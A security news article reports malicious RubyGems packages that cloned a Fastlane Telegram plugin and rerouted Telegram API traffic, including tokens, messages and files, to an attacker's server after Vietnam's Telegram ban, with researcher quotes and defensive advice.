Supply chain attack hits RubyGems to steal Telegram API data – Source: www.csoonline.com

An ongoing supply chain attack is targeting the RubyGems ecosystem to publish malicious packages intended to steal sensitive Telegram data.

Published by a threat actor using multiple accounts under aliases Bùi nam, buidanhnam, and si_mobile, the malicious gems (ruby packages) pose as legitimate Fastlane plugins and exfiltrate data to an actor-controlled command and control (C2) server. Fastlane is a popular open-source tool, used extensively in CI/CD pipelines, to automate building, testing, and releasing mobile apps (iOS and Android).

“Malicious actors take advantage of the trust inherent in open-source environments by embedding harmful code that can jeopardize systems, steal sensitive information, or, in this case, misdirect critical API traffic,” said Eric Schwake, director of cybersecurity strategy at Salt Security. “The identification of certain Ruby gems aimed at exfiltrating Telegram API tokens and messages highlights a significant and ongoing risk to the software supply chain.”

The ongoing attack was first spotted by Socket’s Threat Research Team, who noted that the malicious gems appeared just days after Vietnam’s nationwide Telegram ban, likely to exploit the heightened demand for Telegram workarounds with “proxy” offerings.

Two rogue plugins in circulation

Threat actor published two malicious gems: “fastlane-plugin-telegram-proxy” and “fastlane-plugin-proxy_telegram,” near-identical clones of the legitimate “fastlane-plugin-telegram.”

While the packages retained all the same functionalities and documentation of the legitimate plugin, they added a critical alteration. The modified gems featured a redirect for all Telegram API traffic to an actor-controlled C2.

“These gems silently exfiltrate all data sent to the Telegram API (used by the Fastlane plugin) by redirecting traffic through a C2 server controlled by the threat actor,” security researcher Kirill Boychenko said in a blog post. “This includes bot tokens, chat IDs, message content, and attached files.”

Threat actors modified the legitimate plugin behavior of sending messages to Telegram using the Telegram Bot API by replacing the Telegram API endpoint (https:/api.telegra.org) with their own (C2) server.

“A single line swap rerouted every Telegram API call through a Cloudflare Worker under an attacker’s control, siphoning tokens, files, IDs, and more,” said Jason Soroko, Senior Fellow at Sectigo.

Risk may extend past the regional ban

The malicious packages (Gems) were published by the threat actor on May 24, 2025, three days after Vietnam’s Ministry of Information and Communications ordered a nationwide ban on Telegram and gave internet service providers until June 2 to report compliance.

Apart from the timing, the aliases used by the threat actor also suggested a Vietnamese theme, along with the “Telegram proxy” hook used for marketing the gems. While seemingly targeted, the attack may still have impacts outside of the ban.

“The operator, using Vietnamese-language aliases, pushed the gems days after Vietnam banned Telegram, but the code has no geofence, so any Fastlane pipeline that pulled the plugin was compromised,” Soroko explained.

For potential targets, Boychenko recommended verifying Telegram proxies—if they are looking for one—by checking for open-source licensing, transparent author details, configurable endpoints (not silent, hardcoded replacements), and clear privacy and logging policies. Typosquatting dependencies remain a popular supply chain attack technique.

Recently, attackers were found dropping over 60 malicious npm packages within two weeks to steal network information, a discovery also reported by Boychenko. Malicious actors have also begun a novel approach of exploiting AI hallucinations to carry out SlopSquatting attacks, publishing malicious packages with names that AI tools might incorrectly suggest to developers.